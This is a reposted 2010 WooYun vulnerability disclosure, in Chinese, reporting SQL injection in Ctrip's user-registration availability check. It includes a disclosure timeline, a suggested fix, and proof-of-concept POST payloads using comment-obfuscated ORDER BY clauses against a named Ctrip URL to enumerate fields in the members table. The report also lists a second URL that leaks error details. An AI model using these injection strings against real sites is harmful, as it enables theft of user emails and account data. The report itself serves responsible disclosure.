携程网某ajax验证存在sql注入
漏洞詳情
披露狀態:
2010-07-30: 細節已通知廠商并且等待廠商處理中
2010-07-30: 廠商已經確認,細節僅向廠商公開
2010-08-09: 細節向核心白帽子及相關領域專家公開
2010-08-19: 細節向普通白帽子公開
2010-08-29: 細節向實習白帽子公開
2010-08-29: 細節向公眾公開
簡要描述:
位置較敏感,發生在members表,可以發現表的一些字段,能夠竊取任何人的包括email等信息,未深入測試
詳細說明:
用戶注冊時,"驗證用戶是否存在"因過濾不嚴謹導致sql注入
另外:
http://www.ctrip.com/robots.txt
http://destguides.ctrip.com/destguides/journals/AllSingleJournals.aspx?Writing=130079%27%273
暴露了敏感信息
漏洞證明:
http://www.ctrip.com/member/CheckUser.asp
post: signup_uid=xyyxx1x'/**/order/**/by/**/1--
post: signup_uid=xyyxx1x'/**/order/**/by/**/uid--
post: signup_uid=xyyxx1x'/**/order/**/by/**/email--
嘗試不正確的字段導致不同結果,輸入".`"等字符及其它注入手段測試(可能存在ids)
修復方案:
1.白名單驗證
2.屏蔽或友好提示錯誤
版權聲明:轉載請注明來源?路人甲@烏云
總結
以上是生活随笔為你收集整理的携程网某ajax验证存在sql注入的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: snomed ct
- 下一篇: 技术干货 | 录屏采集实现教程 —— i